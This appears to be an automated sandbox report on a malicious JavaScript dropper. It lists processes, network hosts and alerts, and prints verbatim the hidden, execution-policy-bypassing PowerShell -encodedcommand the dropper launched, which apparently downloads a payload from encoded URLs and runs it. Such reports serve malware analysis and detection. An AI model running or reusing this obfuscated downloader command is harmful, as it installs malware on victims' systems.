Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | May 16, 2023, 10:33 a.m. | May 16, 2023, 10:35 a.m. |
-
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Azpq.js" Pinbrain AlphanumericBristles hyperbarbarismPhenazine
2188-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAG8AbABlAHcAbwByAHQAIAA9ACAAIgBhAHIAYQB3AGEAawAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJAB1AG4AaABvAG0AbwBsAG8AZwBpAHoAZQBkAEQAaQBzAHQAcgBhAGMAdABpAG4AZwAgAD0AIAAiAGgAbwBsAGwAeQBoAG8AYwBrACIAOwAkAGIAdQBtAGIAbABlAGIAZQByAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADIAQQBHAGsAQQBjAHcAQgBwAEEARwBJAEEAYgBBAEIANQBBAEUAOABBAFkAdwBCAGoAQQBHAGsAQQBaAEEAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAHUAQQBHAGMAQQBZAFEAQgB0AEEARwBVAEEAYwB3AEEAPQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAGsAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgB1AEEARwBVAEEAYwBnAEIAegBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBRAEEAWgBRAEIAMwBBAEcATQBBAGQAUQBCAHcAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBnAEEAdQBBAEcAUQBBAGIAdwBCAG4AQQBBAD0APQAiADsAJABtAHkAZQBsAG8AbgBpAGMAIAA9ACAAIgBtAGEAegBlAGQAbAB5AEcAbAB5AGMAbwBnAGUAbgBvAGwAeQBzAGkAcwAiADsAJABTAHEAdQBpAGwAbABpAGQAYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAVgBBAEgAWQBBAE4AZwBBAHkAQQBFAEUAQQBPAFEAQgB0AEEAQQA9AD0AVwBmAHgAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAFEAQQB2AEEARQB3AEEAWgBRAEIAeABBAEMAOABBAFQAUQBCAEkAQQBGAEEAQQBWAFEAQgBCAEEARQBVAEEAZAB3AEEAdwBBAEcARQBBAFcAUQBCAFEAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AYwBvAG0AbQBvAGQAaQBvAHUAcwAgAGkAbgAgACQAUwBxAHUAaQBsAGwAaQBkAGEAZQAgAC0AcwBwAGwAaQB0ACAAIgBXAGYAeABmACIAKQAgAHsAJAByAGEAdgBpAHMAaABtAGUAbgB0AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB5AEEASABrAEEAYwBBAEIAbwBBAEcARQBBAFoAUQBCAHUAQQBHAGsAQQBaAEEAQgBRAEEARwBnAEEAWgBRAEIAdQBBAEcAOABBAGUAQQBCAHAAQQBHAFEAQQBMAGcAQgB1AEEARwBjAEEAYgB3AEEAPQB5AHIAPQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEkAQQBhAFEAQgB2AEEASABBAEEAYQBBAEIANQBBAEgAUQBBAFoAUQBCAFEAQQBIAEkAQQBaAFEAQgB3AEEARwBFAEEAYwBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJAB0AGUAbABlAGMAYQBtAGUAcgBhACAAPQAgADMAMAA0ADsAJABpAG4AYwBsAGEAcwBwAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAGMAbwBtAG0AbwBkAGkAbwB1AHMAKQApADsAaQB3AHIAIAAkAGkAbgBjAGwAYQBzAHAAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGYAbwB1AGwAaQBzAGgAUgBpAHYAZQByAGwAZQBzAHMALgBBAGcAbwBuAGkAYQBQAGgAbwBuAG8AbQBpAG0AaQBjADsAJABjAGEAZQBzAGEAcgBpAHMAdABzACAAPQAgACIAUwBhAHIAbwBuAGkAYwBJAG4AdgBhAGcAaQBuAGEAdABpAG4AZwAiADsAJABUAHcAaQBzAHQAZQBuAGUAZABIAGUAbQBpAGUAcABpAGwAZQBwAHMAeQAgAD0AIAAiAHIAZQBjAGEAcAB0AGkAdgBhAHQAaQBvAG4AUwBpAG0AcABsAHkAIgA7ACQAdABpAHQAbABlAG4AZQBHAHUAbgBkAGkAZQAgAD0AIAAiAE4AbwBuAGIAYQBzAGUAbQBlAG4AdABXAGkAcwBlAGgAZQBhAHIAdABlAGQAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABmAG8AdQBsAGkAcwBoAFIAaQB2AGUAcgBsAGUAcwBzAC4AQQBnAG8AbgBpAGEAUABoAG8AbgBvAG0AaQBtAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA3ADAAOAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBaAGcAQgB2AEEASABVAEEAYgBBAEIAcABBAEgATQBBAGEAQQBCAFMAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYgBBAEIAbABBAEgATQBBAGMAdwBBAHUAQQBFAEUAQQBaAHcAQgB2AEEARwA0AEEAYQBRAEIAaABBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgB0AEEARwBrAEEAYgBRAEIAcABBAEcATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAE4AdQBuAG4AaQBzAGgAIAA9ACAAIgBJAGcAbgBlAG8AYQBxAHUAZQBvAHUAcwBVAG4AcgBvAGIAZQBkACIAOwAkAFEAdQBlAHMAdABpAG8AbgBhAGIAbABlACAAPQAgACIARwBvAG8AcwBlAGIAZQByAHIAeQBOAG8AbgBjAG8AZQByAGMAaQBvAG4AIgA7AGIAcgBlAGEAawA7AE4AZQB4AHQASgBTADsAfQBOAGUAeAB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAdgBlAHIAbgBpAHgAZQBzAFMAbgBhAHAAZAByAGEAZwBvAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEkAQQBNAEEAQQAyAEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAEkAQQB4AE8ATQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBiAEEAQgBzAEEARwBVAEEAZABBAEIAcABBAEcANABBAFoAdwBCAFcAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAWQB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAeQBBAEcAawBBAFkAdwBCAHIAQQBHAFUAQQBkAEEAQQA9AHgATwBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcARQBBAGQAZwBCAGwAQQBHAHcAQQBhAFEAQgB1AEEARwBjAEEAYwB3AEIAUABBAEgAVQBBAGQAQQBCAHoAQQBHAEUAQQBkAEEAQQB1AEEARwAwAEEAWgBRAEEAPQAiADsAJABDAG8AbgBjAGUAcwBzAGkAbwBuAGEAaQByAGUAcwBHAGwAdQBtAHAAaQBuAGUAcwBzACAAPQAgACIAQgB1AHAAbABlAHUAcgB1AG0AQwBhAHQAZQBnAG8AcgBpAHMAZQAiADsAJABhAHMAYwBhAGIAYQByAHQARgBhAGMAaQBsAGkAdABhAHQAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE0AZwBBAHUAQQBEAFUAQQBOAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBRAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBZAFEAQgB5AEEARwBrAEEATABnAEIAbwBBAEcAOABBAGIAQQBCAGsAQQBHAGsAQQBiAGcAQgBuAEEASABNAEEAawBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgB6AEEARwBVAEEAYwBnAEIAcABBAEcAOABBAGQAUQBCAHoAQQBHAHcAQQBlAFEAQQB1AEEARwBFAEEAWQB3AEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAFEAQQBZAFEAQgB1AEEASABRAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEcANABBAGMAUQBCADEAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAWgBBAEEAdQBBAEcAWQBBAGMAZwBBAD0AIgA7AH0AfQAkAEUAeABzAGUAYwBhAG4AdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWQBRAEIAMABBAEgAUQBBAGIAQQBCAGwAQQBHAEkAQQBkAFEAQgB6AEEARwBnAEEAUQBnAEIAcABBAEcAYwBBAGEAQQBCADAAQQBHAFUAQQBaAEEAQQB1AEEARwAwAEEAWQBRAEIAeQBBAEcAcwBBAFoAUQBCADAAQQBBAD0APQAiADsAJABzAHEAdQBpAGIAcwB0AGUAcgBIAGUAeABhAG0AZQB0AGgAeQBsAGUAbgBlAHQAZQB0AHIAYQBtAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAGwAQQBHAGsAQQBaAEEAQgBsAEEARQA4AEEAWgBnAEIAbQBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBkAGcAQgBsAEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AbABpAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAeQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBBAEEAdQBBAEQASQBBAE0AQQBBADEAQQBBAD0APQBsAGkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQAzAEEARABNAEEAIgA7ACQAdAByAG8AcABoAG8AZABlAHIAbQBCAGUAbgB6AGkAbAAgAD0AIAAyADEANwA7AA=="
2384
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAG8AbABlAHcAbwByAHQAIAA9ACAAIgBhAHIAYQB3AGEAawAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJAB1AG4AaABvAG0AbwBsAG8AZwBpAHoAZQBkAEQAaQBzAHQAcgBhAGMAdABpAG4AZwAgAD0AIAAiAGgAbwBsAGwAeQBoAG8AYwBrACIAOwAkAGIAdQBtAGIAbABlAGIAZQByAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADIAQQBHAGsAQQBjAHcAQgBwAEEARwBJAEEAYgBBAEIANQBBAEUAOABBAFkAdwBCAGoAQQBHAGsAQQBaAEEAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAHUAQQBHAGMAQQBZAFEAQgB0AEEARwBVAEEAYwB3AEEAPQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAGsAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgB1AEEARwBVAEEAYwBnAEIAegBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBRAEEAWgBRAEIAMwBBAEcATQBBAGQAUQBCAHcAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBnAEEAdQBBAEcAUQBBAGIAdwBCAG4AQQBBAD0APQAiADsAJABtAHkAZQBsAG8AbgBpAGMAIAA9ACAAIgBtAGEAegBlAGQAbAB5AEcAbAB5AGMAbwBnAGUAbgBvAGwAeQBzAGkAcwAiADsAJABTAHEAdQBpAGwAbABpAGQAYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAVgBBAEgAWQBBAE4AZwBBAHkAQQBFAEUAQQBPAFEAQgB0AEEAQQA9AD0AVwBmAHgAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAFEAQQB2AEEARQB3AEEAWgBRAEIAeABBAEMAOABBAFQAUQBCAEkAQQBGAEEAQQBWAFEAQgBCAEEARQBVAEEAZAB3AEEAdwBBAEcARQBBAFcAUQBCAFEAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AYwBvAG0AbQBvAGQAaQBvAHUAcwAgAGkAbgAgACQAUwBxAHUAaQBsAGwAaQBkAGEAZQAgAC0AcwBwAGwAaQB0ACAAIgBXAGYAeABmACIAKQAgAHsAJAByAGEAdgBpAHMAaABtAGUAbgB0AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB5AEEASABrAEEAYwBBAEIAbwBBAEcARQBBAFoAUQBCAHUAQQBHAGsAQQBaAEEAQgBRAEEARwBnAEEAWgBRAEIAdQBBAEcAOABBAGUAQQBCAHAAQQBHAFEAQQBMAGcAQgB1AEEARwBjAEEAYgB3AEEAPQB5AHIAPQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEkAQQBhAFEAQgB2AEEASABBAEEAYQBBAEIANQBBAEgAUQBBAFoAUQBCAFEAQQBIAEkAQQBaAFEAQgB3AEEARwBFAEEAYwBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJAB0AGUAbABlAGMAYQBtAGUAcgBhACAAPQAgADMAMAA0ADsAJABpAG4AYwBsAGEAcwBwAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAGMAbwBtAG0AbwBkAGkAbwB1AHMAKQApADsAaQB3AHIAIAAkAGkAbgBjAGwAYQBzAHAAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGYAbwB1AGwAaQBzAGgAUgBpAHYAZQByAGwAZQBzAHMALgBBAGcAbwBuAGkAYQBQAGgAbwBuAG8AbQBpAG0AaQBjADsAJABjAGEAZQBzAGEAcgBpAHMAdABzACAAPQAgACIAUwBhAHIAbwBuAGkAYwBJAG4AdgBhAGcAaQBuAGEAdABpAG4AZwAiADsAJABUAHcAaQBzAHQAZQBuAGUAZABIAGUAbQBpAGUAcABpAGwAZQBwAHMAeQAgAD0AIAAiAHIAZQBjAGEAcAB0AGkAdgBhAHQAaQBvAG4AUwBpAG0AcABsAHkAIgA7ACQAdABpAHQAbABlAG4AZQBHAHUAbgBkAGkAZQAgAD0AIAAiAE4AbwBuAGIAYQBzAGUAbQBlAG4AdABXAGkAcwBlAGgAZQBhAHIAdABlAGQAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABmAG8AdQBsAGkAcwBoAFIAaQB2AGUAcgBsAGUAcwBzAC4AQQBnAG8AbgBpAGEAUABoAG8AbgBvAG0AaQBtAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA3ADAAOAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBaAGcAQgB2AEEASABVAEEAYgBBAEIAcABBAEgATQBBAGEAQQBCAFMAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYgBBAEIAbABBAEgATQBBAGMAdwBBAHUAQQBFAEUAQQBaAHcAQgB2AEEARwA0AEEAYQBRAEIAaABBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgB0AEEARwBrAEEAYgBRAEIAcABBAEcATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAE4AdQBuAG4AaQBzAGgAIAA9ACAAIgBJAGcAbgBlAG8AYQBxAHUAZQBvAHUAcwBVAG4AcgBvAGIAZQBkACIAOwAkAFEAdQBlAHMAdABpAG8AbgBhAGIAbABlACAAPQAgACIARwBvAG8AcwBlAGIAZQByAHIAeQBOAG8AbgBjAG8AZQByAGMAaQBvAG4AIgA7AGIAcgBlAGEAawA7AE4AZQB4AHQASgBTADsAfQBOAGUAeAB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAdgBlAHIAbgBpAHgAZQBzAFMAbgBhAHAAZAByAGEAZwBvAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEkAQQBNAEEAQQAyAEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAEkAQQB4AE8ATQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBiAEEAQgBzAEEARwBVAEEAZABBAEIAcABBAEcANABBAFoAdwBCAFcAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAWQB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAeQBBAEcAawBBAFkAdwBCAHIAQQBHAFUAQQBkAEEAQQA9AHgATwBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcARQBBAGQAZwBCAGwAQQBHAHcAQQBhAFEAQgB1AEEARwBjAEEAYwB3AEIAUABBAEgAVQBBAGQAQQBCAHoAQQBHAEUAQQBkAEEAQQB1AEEARwAwAEEAWgBRAEEAPQAiADsAJABDAG8AbgBjAGUAcwBzAGkAbwBuAGEAaQByAGUAcwBHAGwAdQBtAHAAaQBuAGUAcwBzACAAPQAgACIAQgB1AHAAbABlAHUAcgB1AG0AQwBhAHQAZQBnAG8AcgBpAHMAZQAiADsAJABhAHMAYwBhAGIAYQByAHQARgBhAGMAaQBsAGkAdABhAHQAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE0AZwBBAHUAQQBEAFUAQQBOAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBRAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBZAFEAQgB5AEEARwBrAEEATABnAEIAbwBBAEcAOABBAGIAQQBCAGsAQQBHAGsAQQBiAGcAQgBuAEEASABNAEEAawBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgB6AEEARwBVAEEAYwBnAEIAcABBAEcAOABBAGQAUQBCAHoAQQBHAHcAQQBlAFEAQQB1AEEARwBFAEEAWQB3AEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAFEAQQBZAFEAQgB1AEEASABRAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEcANABBAGMAUQBCADEAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAWgBBAEEAdQBBAEcAWQBBAGMAZwBBAD0AIgA7AH0AfQAkAEUAeABzAGUAYwBhAG4AdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWQBRAEIAMABBAEgAUQBBAGIAQQBCAGwAQQBHAEkAQQBkAFEAQgB6AEEARwBnAEEAUQBnAEIAcABBAEcAYwBBAGEAQQBCADAAQQBHAFUAQQBaAEEAQQB1AEEARwAwAEEAWQBRAEIAeQBBAEcAcwBBAFoAUQBCADAAQQBBAD0APQAiADsAJABzAHEAdQBpAGIAcwB0AGUAcgBIAGUAeABhAG0AZQB0AGgAeQBsAGUAbgBlAHQAZQB0AHIAYQBtAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAGwAQQBHAGsAQQBaAEEAQgBsAEEARQA4AEEAWgBnAEIAbQBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBkAGcAQgBsAEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AbABpAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAeQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBBAEEAdQBBAEQASQBBAE0AQQBBADEAQQBBAD0APQBsAGkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQAzAEEARABNAEEAIgA7ACQAdAByAG8AcABoAG8AZABlAHIAbQBCAGUAbgB6AGkAbAAgAD0AIAAyADEANwA7AA==" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAG8AbABlAHcAbwByAHQAIAA9ACAAIgBhAHIAYQB3AGEAawAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJAB1AG4AaABvAG0AbwBsAG8AZwBpAHoAZQBkAEQAaQBzAHQAcgBhAGMAdABpAG4AZwAgAD0AIAAiAGgAbwBsAGwAeQBoAG8AYwBrACIAOwAkAGIAdQBtAGIAbABlAGIAZQByAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADIAQQBHAGsAQQBjAHcAQgBwAEEARwBJAEEAYgBBAEIANQBBAEUAOABBAFkAdwBCAGoAQQBHAGsAQQBaAEEAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAHUAQQBHAGMAQQBZAFEAQgB0AEEARwBVAEEAYwB3AEEAPQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAGsAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgB1AEEARwBVAEEAYwBnAEIAegBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBRAEEAWgBRAEIAMwBBAEcATQBBAGQAUQBCAHcAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBnAEEAdQBBAEcAUQBBAGIAdwBCAG4AQQBBAD0APQAiADsAJABtAHkAZQBsAG8A